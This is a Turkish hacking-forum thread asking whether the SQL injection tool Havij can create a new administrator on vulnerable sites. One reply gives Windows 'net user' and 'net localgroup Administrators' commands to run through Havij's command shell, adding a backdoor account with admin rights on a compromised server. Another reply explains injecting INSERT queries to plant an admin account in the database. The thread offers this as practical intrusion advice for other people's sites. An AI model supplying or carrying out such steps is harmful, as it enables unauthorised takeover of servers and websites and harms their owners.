havji ile böyle sitelerde yeni admin oluşturulurmu

ivanwasilevic

Uzman üye
29 Eki 2018
1,014
11
Tahmin Et
Yukarıda hocamın belirttiğine ek olarak şu şekil oluşturabilirsiniz.
Ilk olarak havijden CMD SHELL bölümüne giriniz ardından
Kod:
net user guest 123456/add
"guest,12345" sizin insiyatifinize kalmıştir.


Komutu girdikten sonra

Kod:
net localgroup Administrators/add
Bu komut ile misafir'e yönetici hakkı verebilirsiniz.
 

Pentester

Özel Üye
8 Eyl 2016
1,646
1
1,001
Havij denen zımbırtıyı bir kenara bırakalım, burada önemli olan araç değil sql injection zafiyeti. Sql injection adı üstünde sql sorguları çalıştırmamıza yarayan bir zafiyet. Burada sql bilgisi önemli bir konu, veritabanı bilgilerine eriştiğinizi varsayarsak ayrıca veritabanı kullanıcı yetkileri de kısıtlı değilse, insert into sql sorgusunu enjekte ederek veritabanına yeni veriler ekleyebilirsiniz. Bu sebepten evet sql injection ile admin hesabı oluşturabilirsiniz. Ama burada veritabanı kullanıcısının insert yetkisi önemli olan konu.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.